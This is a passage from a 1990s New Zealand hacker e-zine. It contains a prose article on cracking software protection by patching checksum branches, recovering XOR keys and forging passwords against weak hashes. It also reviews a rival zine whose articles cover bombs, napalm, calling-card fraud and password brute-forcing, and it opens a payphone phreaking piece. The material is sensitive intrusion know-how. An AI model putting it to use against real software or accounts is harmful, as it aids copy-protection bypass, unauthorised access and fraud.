  1684. So, if you are up to here, you're half way to being a K-RAD ELITE DUDE
  1685. anyway.  In fact, you can probably do more interesting things that most who
  1686. call themselves "K-RAD ELITE DUDE"s - so why are you reading this?  That's
  1687. right, you thought you might pick up a hint or two in an underground
  1688. publication.  Ok, I hope you learn something.
  1689.  
  1690. First:
  1691. What do I mean "Data Deprotection" ???
  1692.  
  1693. This is probably not the best name for what I will actually describe, but
  1694. it is all I could think of.  I mean "getting into data" - but not in the
  1695. sense of cryptanalasys and that sort of thing that requires a degree.
  1696. Data Deprotection has particular reference to more breaking encryption
  1697. algorithms, to getting around or breaking checksums and CRC's, and making
  1698. small but crucial changes to programs.
  1699.  
  1700. NOTE:  Some people would call some uses of these skills "Cracking", and
  1701. assume that you go around breaking the protection on games.  This is
  1702. distinctly possible, but before I go further, I would like to point out my
  1703. personal feelings on breaking program protection:
  1704.  
  1705. If you "crack" a game and distribute it, you are killing the software
  1706. industry.  Anyway, you needed an original to crack - which someone had to
  1707. buy - so whoever bought it is stupid if they pay for something then let
  1708. everyone else have it.  Basically, I do crack games and things, but I don't
  1709. spread what I do.  The main reason for this is that I'm not good enough to
  1710. keep up with the "big boys" in Europe who crack the latest game overnight.
  1711. If I get hold of an original game, it is usually fairly old anyway, like a
  1712. year or two, and even back then they had some pretty tricky protection that
  1713. has taken a while to get around (like a few days work).  Of course, there
  1714. are those dead simple games (try Eye of the Beholder II for a beginners
  1715. one).  Thing is, everyone has it by the time I have finished with it.  So I
  1716. don't crack to spread.  I hardly crack games at all, since my access to
  1717. originals is limited.  I crack only for the fun of it.  And it is quite
  1718. fun to pitch your mind against those of the programmers - kind of like
  1719. chess play-by-purchase.  Anyway, that's my ideas on cracking games etc.  If
  1720. you want to, go ahead.  It just kills the industry.  This is why this
  1721. article will deal as little as possible with things that could be used to
  1722. crack games.  It will deal more with accessing data from programs that you
  1723. aren't really 'sposed to access.
  1724.  
  1725. So, you have this program.  You have made whatever change to it for
  1726. whatever reason, an it now comes up "corrupt data" or something along those
  1727. lines.  Now, all you did was change a "Compare with password" to a "Don't
  1728. do anything" - so you know it should be able to work fine.
  1729.  
  1730. To see if a checksum is your problem, try running the program in it's
  1731. original form from your debugger.  Just straight running it.  If it still
  1732. comes up "error" then your debugger just 'aint good enough, since it is not
  1733. totally transparent to the program.  It would require a discussion on each
  1734. debugger to fix this, and I only know those that I use.
  1735.  
  1736. If it ran OK, try placing a breakpoint at the place where you change things
  1737. and then running the program.  Don't do anything at the breakpoint, just
  1738. run the program.  If it fails, chances are you have a checksum.  If not,
  1739. try putting the breakpoints around your place you changed, and after they
  1740. break, put them back.  If it fails, it's probably some sort of check.  If
  1741. not, something wierd is happening.  The reason behind this is that almost
  1742. all debuggers will use breakpoints that actually change the memory that you
  1743. place a breakpoint on.  So when a program goes to check it's memory, if
  1744. there is a breakpoint there, it won't find what it thought it would.
  1745.  
  1746. So, your program has a checksum?  If not, you will need to do a little more
  1747. hacking to find out what's up.  It usually 'aint too hard, but beyond the
  1748. scope of this text.  Well, the next thing to do is FIND the checksum.
  1749.  
  1750. This can be done by placing a breakpoint on your place to change.  If you
  1751. run it and without putting the breakpoint back after it occurs then your
  1752. program runs fine, then your check is AFTER the part you altered.  If it
  1753. fails, then the checksum is BEFORE the part you altered.  Pretty simple
  1754. really.  You can further narrow this down by putting breakpoints at
  1755. strategic points throughout the code, and watching what happens when you
  1756. have a breakpoint in existence only up to there.  You will eventually find
  1757. the area of code that does the check.
  1758.  
  1759. Once you have found this piece of code, you can figure out what it does.
  1760. Chances are your program is in some form of compiled language, so won't be
  1761. as easy to read as 100% assembler code, but by tracing through it, you can
  1762. usually figure out what's up.  The skill is to look for critical points in
  1763. the code.  THERE WILL (almost) ALWAYS BE A COMPARE after any sort of
  1764. checksum, wether it be a simple addition, or a complicated CRC.  This
  1765. compare will then have a conditional statement - this is the crux of it.
  1766. All you do is remove the conditional and cover it with a constant - if it
  1767. is supposed to branch if a certain value, make it branch always.  If it
  1768. branches only if NOT a certain value, make it a do-nothing set of
  1769. instructions.  Sometimes there will be more than one check of the value, so
  1770. you must find all of them.
  1771.  
  1772. I feel I may have just skipped a vital idea.  We changed the conditional
  1773. rather than the compare value because we want all future attempts at this
  1774. routine to be correct. This may be easier illustrated in, for example, a
  1775. trainer mode for a game.  It is better to make UNLIMITED lives by removing
  1776. the conditional, than to have 9999999 lives - because you can still die.
  1777. Also it is a lot easier to change back to it's original form if you stuff
  1778. up, because you only need write down the opcodes, not the constant.
  1779.  
  1780. Now you have just gotten around a check in the program.  There may be more,
  1781. and they may be hidden.  So just test your program for full functionality.
  1782. Insert your original alteration, and test again.  If you still have
  1783. problems, try this again.  There could be multiple checks, checks on
  1784. checks, and all sorts of stuff.
  1785.  
  1786. You will notice now that the "difference" between your original program
  1787. and the altered one will only be a few key bytes.  However it is how these
  1788. key bytes are placed that is important.
  1789.  
  1790. This is only one skill of many you will pick up as a hacker / cracker, but
  1791. one of the most used.
  1792.  
  1793. And now to make this entire section useless, I shall tell you how to get
  1794. around this type of hacking / cracking when you are on the programming end.
  1795. MAKE YOUR CHECK VARIABLES DO SOMETHING.  If you calculate the CRC or some
  1796. vital code, don't just compare it, use it as a relative pointer into a data
  1797. segment.  If the CRC is wrong, your system crashes.  It's best to not even
  1798. COMPARE it, as this means you have the correct value sitting there.  Just
  1799. assume it is right, and have the checksum or CRC or whatever in your
  1800. initialization code, but don't use it till much later on.  This way your
  1801. hacker will likely give up.
  1802.  
  1803. And to make that useless - how to crack programs that use this technique
  1804. (gee, get the feeling every crack leads to a fix, and every fix leads to a
  1805. crack?).  Just debug the program, figure out the correct value for the CRC
  1806. or whatever, and hard-code that in!  Wipe over the CRC routine with one
  1807. that sets any variables it was supposed to correctly.  Chances are it will
  1808. take up less space anyway!
  1809.  
  1810. So, we have done "actually changing a program" from the point of view of
  1811. making it run with changes.  Now I shall cover (very basically) encryption
  1812. and decryption.
  1813.  
  1814. Encryption is mostly used to keep things from prying eyes.  Which is
  1815. exactly what makes me want to break it.  A program might have it's
  1816. datafiles stored encrypted to stop you getting unfair hints, or it might
  1817. have some of it's code encrypted that does some magical copy protection.
  1818.  
  1819. Essential to the breaking of codes with reference to programs, is that any
  1820. program has all the code necessary to decrypt it's data.  PGP has all it's
  1821. code there in source form, what could be easier.  However, this is where
  1822. the first problem starts - the KEY.  If you know the key, you really dont
  1823. need to be reading this.  If you don't know the key, you have to break the
  1824. algorithm.  This is where it gets hard.  PGP is more or less unbreakable,
  1825. because it uses a complicated algorithm and a complex and constantly
  1826. changing key (different for each person).
  1827.  
  1828. However most programs use only 1 key, and that is usually stored within
  1829. the program itself.  The simplest of routines is that you get all your
  1830. data, and logically NOT it, ie all 1's become 0's and all 0's become 1's.
  1831. For this simple system, the algorithm IS the key.  All you do is reverse
  1832. the algorithm, ie run it over again, and out comes your data.
  1833.  
  1834. Another logical operator, Exclusive-OR (sometimes refered to as EOR or
  1835. XOR), is commonly used.  This is easiest thought of as a "selective not" -
  1836. where each bit in the "key" (source) says wether each bit in the
  1837. destination should be "NOT"'d.  If the key bit is a 1, it is.  So a key of
  1838. 1010 and a dest of 1001 would become 0011.  This also is also a reversible
  1839. algorithm, so all you do is run it over again.  EOR has the advantage as a
  1840. algorithm with a "key" component.  The KEY can be difficult to guess,
  1841. especially if it is more than 1 byte.  However there are ways to get around
  1842. it.  First, see if the program uses a fixed key - ie debug / disassemble it
  1843. and see.  If so, there you have it.  A little playing around and you have
  1844. your data.
  1845.  
  1846. This brings me to the next main point of this article - finding the EOR key
  1847. if you don't have one.  This is actually really easy - all you need to do
  1848. is know some of the data that is after the EOR, and the length of the Key.
  1849. The length of the key can usually be determined from the algorithm, if it
  1850. is a continuous loop of EOR'ing a byte with some data, the key is a byte.
  1851. If it is going through a reference table (and you can't just dig this table
  1852. up) then you have to figure out how long it is.  You also need to know at
  1853. least one keylength of decrypted data.
  1854.  
  1855. What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR
  1856. 1001 = 1010 - in other words, the key acting on the cypher yields the data,
  1857. and the data acting on the cypher yields the key!  So all you do is write a
  1858. small program that gets your data, and eor's it with the cypher, and you
  1859. have the key.  You can also build a key from some fragments of data by
  1860. guessing what the data in between might be - if this is text, it is usually
  1861. easy.  Now you apply your key to the rest of the data.  Simple!
  1862.  
  1863. However one problem is that you usually don't know where abouts in the
  1864. cypher your data comes from - so the solution is to write a program that
  1865. uses the data in every possible position in the cypher to yield every
  1866. possible key, and then use that key on every piece of cypher, and see what
  1867. comes out.  This may take a while, and you need to be able to recognize the
  1868. data in it's correct form, easy if it's text, otherwise difficult.
  1869.  
  1870. Other common forms of encryption are addition / subtraction of constant or
  1871. changing values, rotation of bits (either in byte, word, or larger blocks),
  1872. and swapping blocks of data (be they bits, bytes or larger blocks).  The
  1873. important thing to remember is that the program itself has to be able to
  1874. decrypt the data, so with enough care and patience you can find that bit
  1875. and copy it.  Remember also that there can be more than one level of
  1876. encryption, and different sets of algorithms for different blocks of data.
  1877.  
  1878. The final thing I wish to deal with is the topic of "One Way Encryption" -
  1879. it is used sometimes to create keys for the above checks and decryption.
  1880.  
  1881. It is also useful if you can break the algorithm to make an automatic
  1882. password generator for encrypted files from a given program...
  1883.  
  1884. This situation is actually very common.  It is a real pain.  However, you
  1885. spot an algorithm that creates the key, possible from a password!  Now,
  1886. somehow a password of any length is "shrunk" or "expanded" to fit a given
  1887. key length, and this is used to decrypt the data.  This is called "One Way"
  1888. encryption, and is commonly used on passwords.  The key created has little
  1889. bearing to the original password, and can't be recovered because there is
  1890. usually a "loss of significance" of data.
  1891.  
  1892. The simplest way to explain is to use the simplest one-way algorithm.  Just
  1893. add all the bytes of a string together, in a byte.  This way you are bound
  1894. to get overflow, rendering some data lost.  However you end up with a byte
  1895. to use, and it will be a byte regardless of the length of the password.
  1896. So, if you can't get the password back, how do you pass the test?  Simple -
  1897. you create a "garbageword".  This is something that is functionally the
  1898. same as the password, but not actually the password.  It is gained by
  1899. reversing the algorithm given the result.
  1900.  
  1901. In this simple algorithm all you do is get your byte key, and subtract as
  1902. many "A"'s as possible from it.  Say your key was hex $BC (which
  1903. incedentially is the byte sum of the letters 'keys'.  You can subtract 'A'
  1904. (hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be
  1905. liked by our algorithm if it only takes text, so we find how much we have
  1906. to TAKE OFF it to get a letter or number.  The closest number is '9' just
  1907. below it, so we use that, and add the extra 1 to one of the 'A's.
  1908. Therefore our garbageword is now 'AB9' - this is functionally the same as
  1909. 'keys' for this algorithm, and so we have broken the lock.
  1910.  
  1911. You will hardly ever get an algorithm as simple as this one, but _ANY_ one
  1912. way encryption can be made to yeild a garbageword given the key if you
  1913. devote enough time to it.
  1914.  
  1915. And how do you stop this sort of breaking of your algorithms?  Easy - make
  1916. it so complex that a hacker will never want to break it. - remember your
  1917. algorithm will always yeild the same key with the same input, so you don't
  1918. have to understand what you have written, you just need to check that it
  1919. makes different keys.
  1920.  
  1921. For example, try to break one that rotates a 2-byte key sotrage by the
  1922. lowest 4 bits of a letter to the right, then adds the letter, then rotates
  1923. left by the upper 4 bits, and EOR's the letter.  This is not actually
  1924. _THAT_ hard to create a reverse algorithm for, it is just very hard to
  1925. create a printable garbageword.  And as long as you make your entry of the
  1926. password only take printable letters, it will be hard to beat.  And you
  1927. have a 1 in 65535 chance of fluking it.  But by using a slightly more
  1928. complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294
  1929. chance.
  1930.  
  1931. And an even "trickier" one to break is the algorithm in PowerPacker
  1932. encrypted executable files.  Nico has thought it out well.  You type in a
  1933. password, and it calcuates a word to compare and tell you if the password
  1934. is valid, but uses a totally separate algorithm to generate a longword for
  1935. the actual decryption key - so any garbageword you make from the compare
  1936. word is only going to have a 1 in 65535 change of being correct...  Makes
  1937. things a little difficult , eh?  And to make it harder the only encrypted
  1938. stuff is the actual crunched data - which seems to be crunched differently
  1939. than with no password as well, so I can't think of any way, short of formal
  1940. cryptanalasys, to get around it.
  1941.  
  1942. Well, that's about it from me, bit this is only the tip of the iceberg of
  1943. what there is to learn before you are even a half-competent hacker in these
  1944. here parts...  But they are 3 important things that will lead to much more.
  1945.  
  1946. * Data wants to be free - so help it out *
  1947.  
  1948.  
  1949.  
  1950.  
  1951.                                    SLi
  1952.  
  1953.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1954.                 ^^^^^                                ^^^^^
  1955.               ^^^^^           Review:  'ToT'            ^^^^^
  1956.                 ^^^^^                                ^^^^^
  1957.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1958.  
  1959.                              Southern Lights
  1960.                                    inc.
  1961.  
  1962.  
  1963.  
  1964.                     REVIEW: 'Tricks of the Trade' [ToT]
  1965.  
  1966.  
  1967. This is the first review that we will be including in the SLi Magazine, but
  1968. we hope to expand to reviewing a few others in the future.
  1969.  
  1970.  
  1971. [PLEASE NOTE:  This is a critical review.  Some have said it has been a little
  1972.                too critical, perhaps that is the case, but the decision is to
  1973.                be left to you, the reader.]
  1974.  
  1975.  
  1976.  
  1977. [BRIEFING]
  1978.  
  1979.  
  1980. WHAT?        Electronic Magazine.
  1981.  
  1982. WHO?         Distributed by:    Raider.
  1983.              Content by    :    Hype, Red Lion, Mutant-X, GreyRat, Nick,
  1984.                                 Demogordon, X-Treme and Kevin.
  1985.  
  1986. WHEN?        24th December 1994
  1987.  
  1988. WHERE?       Written by a group of Wellington H/P/A's.  Perhaps a couple
  1989.              of members out of the Wellington region seeming that at
  1990.              present I am unable to pin-point the locations and identities
  1991.              of a couple of the 'ToT' writers.
  1992.  
  1993. WHY?         This question stumped me for a while as I can only give my
  1994.              opinion.  I came up with the following - a) for the pure
  1995.              reason to educate others coming up in the H/P/A scene,
  1996.              b) to give 'SLi' a taste of competition (this could be fun!)
  1997.              or maybe even, c) to get a bit of the limelight.
  1998.              These are in order of my suspicions from 'A' being the most
  1999.              likely, to 'C' being the least likely.
  2000.  
  2001. HOW?         Thought it was pretty damn obvious, but for those of you who
  2002.              are interested... They got each of the writers to write their
  2003.              articles down on paper then gave them to the editor to type out
  2004.              on his dinky li'l 'puter...
  2005.  
  2006.              [Editors Note: This seems to be the most TIME wasting story
  2007.                             I've EVER heard BUT that's what they did, so
  2008.                             'Raider' said. ]
  2009.  
  2010.  
  2011.  
  2012. [CRITICAL REVIEW]
  2013.  
  2014.  
  2015. This magazine isn't too bad for the first couple of issues, but admittably,
  2016. the first issue had a little more to be desired.
  2017. The idea of there being a variety is 'okay', but that depends on the indi-
  2018. viduals of which the magazine was/is designed for.
  2019.  
  2020. In my opinion, it appears that 'ToT' is designed with the lesser educated
  2021. in the H/P/A scene in mind.  There were quite a number of articles in the
  2022. second issue of 'ToT' in comparison to any of the 'SLi' issues, but the
  2023. articles in 'ToT' were fairly brief and the ideas were a little out-dated.
  2024.  
  2025. It appears that 'ToT' is still in the process of deciding where it wants to
  2026. go - it would've been a better idea if plans had been made earlier and those
  2027. decisions would've made the foundation to start off with.  With 'SLi', all
  2028. the needy decisions had been made PRIOR to even STARTING the magazine.
  2029. 'SLi' was a group of companions FAR before it was a magazine - It's ad-
  2030. viable to know who's going to be there when you need them and whether they
  2031. can be trusted or not.  The only way you can find out is by experimentation.
  2032. And that's what we did.
  2033.  
  2034. Anyway, going back to 'ToT' and it's purpose in the H/P/A scene...
  2035. After a good read throughout the magazine, I noticed that there is a fair
  2036. deal of information dealing with the Australian telephone network.  It may
  2037. do a good job there, but WHO are the main people who are most probably
  2038. going to make use of the information stored within the bits and bytes?
  2039. I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would
  2040. benefit most from the information.  It looks as though 'ToT' is in too
  2041. much of a hurry to be known widespread - 'slow and steady wins the race'
  2042. would be a good phrase to put there.
  2043.  
  2044.  
  2045. Following is an 'article-by-article review' of 'ToT#2':
  2046.  
  2047. [REVIEW]
  2048.  
  2049. [Articles One-Three: Clickers]
  2050.  
  2051. Clickers.  I haven't known of one which has worked yet, but that might just
  2052. be that those of whom have used them had not used them correctly.  Strange
  2053. that they hadn't managed to work for about four people, but I guess you'll
  2054. just have to try them out for yourself considering that I haven't tried
  2055. them out myself.
  2056.  
  2057. At least you'll get your own BBQ lighter... Pretty sure that they'd make a
  2058. pretty good shock device - could be used as a stun gun if they're what I
  2059. think they are.
  2060.  
  2061.  
  2062. [Article Four: Travel Sickness]
  2063.  
  2064. The only flaw I could be sure on commenting on, is the lack of information
  2065. on what they [the tablets] actually do to the human body and whether or
  2066. not they're safe (or at least not lethal).
  2067.  
  2068. If ideas like this one are printed without thought to any consequences they
  2069. may have, we may find that a lot of people may suffer injuries due to the
  2070. lack of information given to the reader.  Mind you, if you're silly enough
  2071. to try something without attempting to find out about it beforehand, then
  2072. you hold as much responsibility as the person responsible for the printing
  2073. of the information given.
  2074.  
  2075.  
  2076. [Article Five: Busted???]
  2077.  
  2078. Well, I guess I have no problems at all with this article.  This is an art-
  2079. icle providing information to the reader which does not prompt for any
  2080. further action.
  2081.  
  2082.  
  2083. [Article Six: Credit Card Calling]
  2084.  
  2085. I had just recently covered this in the 'SLi#3' before I had any knowledge
  2086. of this article at all - it covered basically the same aspects but I'd tried
  2087. to explain it a little more to make sure it was understood better, but this
  2088. article is nonetheless okay, even if I disagree with some of the hints to a
  2089. certain degree.  Still, a good article.
  2090.  
  2091.  
  2092. [Article Seven: Nut n Bolt Bomb]
  2093.  
  2094. It's already well-known that match heads contain explosive chemicals, but
  2095. I think that the writer of this article COULD have at least pointed out how
  2096. dangerous this can be - what with the flying shrapnel and the explosiveness
  2097. of the match head mixture.  I was dismayed at the fact that I couldn't spot
  2098. a single safety warning right throughout the entire magazine at all.
  2099.  
  2100. [Note:  This has already been covered in a few other mags prior to this one,
  2101.         ie.  early editions of Phrack among others.]
  2102.  
  2103.  
  2104. [Article Eight: Hacking Calling Cardz]
  2105.  
  2106. The article was a little vague, but (because of previous experiences with
  2107. this scenario) I could see what they were trying to explain.  I find that
  2108. if you're more polite, you get what you want quicker instead of having to
  2109. bumble around with other unnecessary situations - no one likes a pushy
  2110. operator, so you can imagine how the victims would feel!
  2111.  
  2112.  
  2113. [Article Nine:  One for the Neighbourz]
  2114.  
  2115. Well... I don't really have a comment on this one - read it for yourself..
  2116. I'm kind of, uh, "speachless". =)
  2117.  
  2118.  
  2119. [Article Ten:  Hot Air Balloon]
  2120.  
  2121. A nicely presented article.  I don't think I'd bother trying to build one
  2122. though considering I'd find it a fire-hazard if put together wrong and the
  2123. chances are, I'd do it wrong.  Still, worth a try if you're into this sort
  2124. of thing and are competent in doing so. =)
  2125.  
  2126.  
  2127. [Article Eleven:  Hidenburg Balloon]
  2128.  
  2129. This is just your basic acid-base explosion when you bring a naked flame
  2130. to Hydrogen[?].  A nice little bang, but watch for flying pieces of glass if
  2131. there are any - should be careful.
  2132.  
  2133.  
  2134. [Article Twelve:  Hintz n Tipz for Pot Planting]
  2135.  
  2136. A nice little article on (as it says in the title) hints and tips for the
  2137. planting of marijuana plants.  Not bad.. not bad at all.  Even if originally
  2138. posted on "Bad Sector BBS" and then (with the writer's permission, of course)
  2139. transferred to the magazine - at least it's making use of your resources. =)
  2140.  
  2141.  
  2142. [Article Thirteen:  How to Pass a Lie Detector Test]
  2143.  
  2144. A very entertaining article.. What can I say?  I enjoyed reading it.
  2145. ... But WHERE are you going to have to fake a lie detector test.  If you're
  2146. foolish enuff to get caught, you can guarantee they have enough on you and
  2147. they WONT need you to confirm or deny it.  Well, I guess if you're being in-
  2148. terrogated about certain activities concerning friends, this could be handy.
  2149. Still, a good read - you never know when you might need it.
  2150.  
  2151.  
  2152. [Article Fourteen:  Just 4 Fun]
  2153.  
  2154. Uh, short.  Very short in fact.  A space filler?
  2155.  
  2156.  
  2157. [Article Fifteen:  Corn Bombs]
  2158.  
  2159. A simple, no nonsense bomb.
  2160.  
  2161.  
  2162. [Article Sixteen:  Fucking up a BBS]
  2163.  
  2164. Old concept.  Has been brought up in MANY different places, magazines,
  2165. person-to-person chats, etc... Simple commonsense really.  Telecom seems
  2166. to be tightening up the security of other peoples services - about time
  2167. they'd wised up to the old trick!
  2168.  
  2169.  
  2170. [Article Seventeen:  Hacking CityNet/Genie]
  2171.  
  2172. The first part showed potential for something not to laugh at, although,
  2173. it was an old trick and many people had already been aware of the fact that
  2174. it was something done quite often.  But, why bother when you can just walk
  2175. in and make your own account?  Even one with a fake name.  All you need to
  2176. do is simply USE YOUR COMMONSENSE.  As for the hacking of CityNet/Genie
  2177. passwords with the user's names, you can't guarantee that it's going to
  2178. work.  Is it really worth the trouble?  Are you going to bother finding out
  2179. EVERY SINGLE USER NAME on the system and sit there trying them all day/night?
  2180. I guess you could spend a couple of minutes/hours/days writing a proggy/shell
  2181. script to do it for you, but I wouldn't want to tie my phoneline up!
  2182. The service is free, so isn't that enough?
  2183.  
  2184.  
  2185. [Article Eighteen:  Strange Auzzie Numberz]
  2186.  
  2187. So, how many people out there, who've read this article, are going to fly,
  2188. float, swim, etc... to Australia?  This is of no use to you if you're not
  2189. planning on visiting them within this half-decade or so.  The chances of
  2190. any flaws, from today still being around by that time are pretty slim due to
  2191. the technology boom that should occur in the next few years.  Although, this
  2192. is useful if you have friends/associates living in Aussie who you like to
  2193. keep in contact with.
  2194.  
  2195.  
  2196. [Article Nineteen:  Hackerz Hit Telecom]
  2197.  
  2198. Yet another article dealing with the land mass north-west of New Zealand.
  2199. The article was okay for light reading, but was of little interest to my-
  2200. self.  Similar to 'Article Five:  Busted???' in that it is a "media reported"
  2201. incident.
  2202.  
  2203.  
  2204. [Article Twenty:  008 Diverter]
  2205.  
  2206. Refer to [Article Eighteen:  Strange Auzzie Numberz].
  2207.  
  2208.  
  2209. [Article Twenty-One:  Eureka]
  2210.  
  2211. One word:  Childish...
  2212. Oh, and a couple more:
  2213.  
  2214.                                  ... next please...
  2215.  
  2216.  
  2217. [Article Twenty-Two:  Making Napalm]
  2218.  
  2219. I highly disliked the example of a cat being used and I have already voiced
  2220. my opinion on this to 'Raider'.  I'm not too sure whether they [the writers]
  2221. realize the effects of their ideas seeming that there are going to be those
  2222. people/kids around who will try ANYthing for the sheer sake of it.  Other
  2223. than the use of the cat in the article, there isn't too much more I'd comment
  2224. on.  Interesting mixture - could be useful...... somewhere.. =)
  2225.  
  2226.  
  2227. [Article Twenty-Three:  10 Metre Cigarette Lighter]
  2228.  
  2229. The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient
  2230. idea created 'decades' ago.  As for the petrol soaked rags, I don't think
  2231. there are many people who are planning on trying to KILL the 'victim' - at
  2232. least I'd like to think not.
  2233.  
  2234.  
  2235. [Article Twenty-Four:  Exploding Rockz]
  2236.  
  2237. Could be sore.  How do you feel about 'hail'? =)
  2238.  
  2239.  
  2240. [Article Twenty-Five:  How to Cure a Hangover]
  2241.  
  2242. Interesting tips.  I'll keep them in mind if I need them!
  2243. Oh, another tip for how to cure a hangover - so I was informed - just eat a
  2244. lemon.  I know it would surely bring ME down to earth pretty quickly!
  2245.  
  2246.  
  2247. [Article Twenty-Six:  Coca-Cola Recipe]
  2248.  
  2249. Is it really worth the trouble when, in some places, you can get 500ml
  2250. worth for a single dollar?  What if you stuff up?  You end up with a large
  2251. amount of worthless goo - mind you, you could try selling it to the city
  2252. council to use as TAR. *grin*
  2253.  
  2254.  [Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would
  2255.                 be a LOT harder to find at the local supermarket.]
  2256.  
  2257.  
  2258. [Article Twenty-Seven:  Voodoo Magic]
  2259.  
  2260. Each to one's own.  If you believe it, go for it, I guess.
  2261.  
  2262.  
  2263. [Article Twenty-Eight:  Excusez for Missing Class]
  2264.  
  2265. Lacked information on the consequences of truancy, and take it from someone
  2266. who's knowledgeable of these acts.  It's just not worth it.  As for the cheat-
  2267. ing in exams - What if you're caught?  You may as well forget about getting
  2268. a job you'll enjoy - you'll be stuck with cleaning floors and packing
  2269. burgers, fries and Coke.  Sounds fun, don't it?
  2270.  
  2271.  [Editor's Note: Or making Coke!]
  2272.  
  2273.  
  2274. [Article Twenty-Nine: Greetz and Msgz to Contactz]
  2275.  
  2276. The title says it all... Couldn't find anything wrong with it. =)
  2277.  
  2278.  
  2279. [Article Thirty:  ToT - The Future?]
  2280.  
  2281. Interesting reading.  'Know thine enemy'.  Hehe, nah, I don't think it would
  2282. come to that, but just to be on the safe side... *manical grin* *wink*
  2283.  
  2284.  
  2285. [Article Thirty-One:  Last Wordz]
  2286.  
  2287. Normally skipped by the reader, but worth a read anyway.
  2288.  
  2289.  
  2290. [FINAL ANALISYS]
  2291.  
  2292. Some of the ideas expressed in 'ToT#2' had already been 'spread about'
  2293. prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't
  2294. have made much impact - especially if a lot of people know about them
  2295. already.  If anything, it's a waste of disk space (j/k!).  Some of the art-
  2296. icles, I found rather childish and others a little dangerous - not to mention
  2297. a lack of warnings which was one of my main concerns (it was something we'd
  2298. also forgot about in our previous mags, but you wise up after chats with
  2299. Telecom/other authorities!).
  2300.  
  2301. As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't yet come
  2302. across a 10 yet, so consider me to be a hard marker.. ;) ).  The magazine
  2303. on the whole was 'nice light reading' seeming that the articles are, on
  2304. average, between a third of a page and a page, in length.  Not a bad try
  2305. for a local Wellington H/P/A group really seeming that they had at least
  2306. SOMEthing to say.  If you've got a small attention span, and are new to the
  2307. H/P/A scene, then this is the magazine for you.
  2308.  
  2309. I found it to be of no practical use to me, but it may do for you - it depends
  2310. on WHAT you're actually looking for.  You don't have to take my word for it -
  2311. Why not just grab a copy and read it for y'self?
  2312.  
  2313. Finally, I'd just like to say - Quality, not Quantity is the key to success
  2314. with a good magazine.  Maybe if the editor was interested less in the latter,
  2315. and more in the prior, it may show promise.
  2316.  
  2317. Many electronic magazines don't start out the best - due to lack of organ-
  2318. isation - but they normally get sorted out by about their third issue if
  2319. you're really serious about it.
  2320.  
  2321.  
  2322. [NOTES]
  2323.  
  2324. We, at SLi, welcome ANY comments at all and thoughts of setting up a
  2325. 'Letters to the Editors' section in the magazine are in the process of being
  2326. thought over.  Letters will, or will not, be printed depending on whether
  2327. it's wanted or not - in respective order.
  2328.  
  2329. We can be reached at:
  2330.  
  2331. NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us
  2332.       at _ANY_ of our previous e-mail addresses.
  2333.  
  2334.  
  2335. This email address works at the time of publication:
  2336.  
  2337. hacker_m@ix.wcc.govt.nz
  2338.  
  2339.  
  2340. Snail Mail:
  2341.  
  2342. SLi
  2343. PO Box 3030
  2344. Onekawa
  2345. Napier
  2346.  
  2347.  
  2348.  
  2349.  
  2350.  
  2351.                                     SLi
  2352.  
  2353.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2354.                 ^^^^^                                ^^^^^
  2355.               ^^^^^                 SLi                ^^^^^
  2356.                 ^^^^^                                ^^^^^
  2357.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2358.  
  2359.                              Southern Lights
  2360.                                    inc.
  2361.  
  2362.  
  2363.  In this part of the mag, WE [the guys and gals of SLi] tell ya what the group
  2364.  is doing.
  2365.  
  2366.  
  2367.  WHAT IS SLi? and WHAT WE STAND FOR:
  2368.  
  2369.       Freedom and the right to publish our views and the RIGHT to TEACH _YOU_
  2370.       what we know.  Read the article "Honour" if you want to see what rules
  2371.       we TRY to live by.
  2372.  
  2373.  
  2374.     Members resigned by choice from SLi:
  2375.  
  2376.              Digital Omega -- Quit due to personal reasons.
  2377.  
  2378.  
  2379.     Telco:   Well CyntaxEra's "misuse of a telephone" ooops has sorted
  2380.              itself out...
  2381.  
  2382.  
  2383.     BBS:     Is finally UP AND running, but VERY private.  It's located in
  2384.              Wellington, New Zealand.
  2385.              Email hacker_m@ix.wcc.govt.nz for information on the number and
  2386.              other miscellaneous info.
  2387.  
  2388.  
  2389.  
  2390.                          OFFICIAL SLi BBS's
  2391.                          ~~~~~~~~~~~~~~~~~~
  2392.                       (ie. run by SLi MEMBERS)
  2393.  
  2394.  
  2395.   BBS NAME             MEMBER    PHONE NUMBER/S             SPEED MODEM
  2396.  
  2397.   Hacker's Haven BBS  Thorium  +64-6-844-DATA(+646 844 3282)  28.8k BPS *
  2398.   SLi BBS             Eon      +64-4-475-SCAN(+644 475 XXXX)  14.4k BPS !?
  2399.  
  2400.  
  2401.   * = Only online sometimes.
  2402.   ! = No K0d3z kiddies and NO Warez Puppies!! :)
  2403.   ? = Age limit of 17+.  All files checked.  UNIX system.  79Meg+ H/P/V
  2404.       files.  NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system!
  2405.  
  2406.  
  2407.  
  2408.  
  2409.                                    SLi
  2410.  
  2411.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2412.                 ^^^^^                                ^^^^^
  2413.               ^^^^^          COCOT Phreaking           ^^^^^
  2414.                 ^^^^^                                ^^^^^
  2415.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2416.  
  2417.                              Southern Lights
  2418.                                    inc.
  2419.  
  2420.  
  2421. COCOT Phreaking
  2422. ~~~~~~~~~~~~~~~
  2423.  
  2424. For those of you who are reading this article without any previous knowledge
  2425. of the common everyday COCOT, I'll begin by giving you a brief outline of this
  2426. wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack
  2427. here]
  2428.  
  2429. C  ustomer
  2430. O  wned
  2431. C  oin
  2432. O  perated
  2433. T  elephone.
  2434.  
  2435. There.  Nothing to it.  It's one of those small telephones you find in the old
